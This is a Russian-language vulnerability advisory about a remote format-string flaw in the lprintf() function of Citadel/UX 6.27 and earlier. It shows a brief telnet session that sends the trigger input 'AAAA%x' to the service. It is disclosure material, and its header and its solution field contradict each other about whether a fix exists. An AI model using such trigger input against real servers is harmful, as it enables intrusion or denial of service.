Выполнение произвольного кода в Citadel/UX

Дата публикации:
14.12.2004
Всего просмотров:
904
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Citadel/UX 6.x
Уязвимые версии: Citadel/UX 6.27 и боле ранние версии

Описание:
Обнаружена уязвимость форматной строки в Citadel/UX. Удаленный атакующий может выполнить произвольный код на целевой системе.

Уязвимость обнаружена в функции lprintf() в модуле 'sysdep.c' из-за небезопасного вызова syslog().

Удаленный атакующий может подключиться к целевой службе, и с помощью специально сформированной строки вызвать отказ в обслуживании или выполнить произвольный код. Пример:

coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

URL производителя: www.citadel.org

Решение: Решение на данный момент не существует.

Ссылки: Citadel/UX Format String Error in lprintf() Lets Remote Users Execute Arbitrary Code

или введите имя

CAPTCHA